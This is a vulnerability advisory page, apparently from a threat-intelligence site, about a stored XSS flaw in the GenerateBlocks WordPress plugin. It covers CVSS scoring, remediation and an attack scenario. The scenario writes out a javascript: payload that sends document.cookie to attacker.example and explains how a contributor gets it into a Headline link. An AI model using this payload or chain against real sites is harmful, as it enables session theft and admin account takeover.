Severity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Description requires victim to click the headline link (UI:R not UI:N); scope change retained as contributor payload executes in admin session; C:L/I:L reflect limited but real cross-user impact.
Primary rating from Vendor (Wordfence).
CVSS VectorVendor: Wordfence
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Lifecycle Timeline
2DescriptionCVE.org
The GenerateBlocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Headline Block 'linkMetaFieldType' Dynamic Link Attribute in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. A contributor-level attacker can store a JavaScript payload in their own profile description (allowlisted by get_safe_user_meta_keys()) and prepend 'javascript:' via the linkMetaFieldType attribute, creating a fully attacker-controlled href that executes when any user, including an administrator, clicks the rendered headline link.
AnalysisAI
Stored XSS in the GenerateBlocks WordPress plugin (all versions through 2.2.1) allows contributor-level authenticated attackers to inject arbitrary JavaScript via the Headline Block's linkMetaFieldType dynamic link attribute, executing in the browser of any user - including site administrators - who clicks the injected headline link. The attack chains a get_safe_user_meta_keys() allowlist bypass with insufficient URI scheme validation to construct a fully attacker-controlled javascript: href. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires contributor-level (or higher) authenticated access to the WordPress site - confirmed by CVSS PR:L. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The provided CVSS 3.1 score of 6.4 with vector AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N captures several key risk dimensions accurately but contains a notable inconsistency: the description explicitly states exploitation occurs 'when any user clicks the rendered headline link,' which is user-interactive behavior (UI:R), not UI:N. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | A threat actor with contributor-level access stores a `javascript:document.location='https://attacker.example/steal?c='+document.cookie` payload in their WordPress profile description, which passes the `get_safe_user_meta_keys()` allowlist check. They then create or edit a page using the GenerateBlocks Headline Block, configuring `linkMetaFieldType` to reference their own profile meta field, causing the plugin to render a `javascript:`-prefixed href in the published page. … |
| Remediation | Update GenerateBlocks to a version above 2.2.1 by installing the patched release via the WordPress plugin repository; the upstream fix is referenced at https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3582036%40generateblocks&new=3582036%40generateblocks. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
More in Generateblocks
View allThe GenerateBlocks WordPress plugin before 1.4.0 does not validate the generateblocks/container block's tagName attribut
The GenerateBlocks plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and inclu
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-41522
GHSA-735g-4w2p-c7c6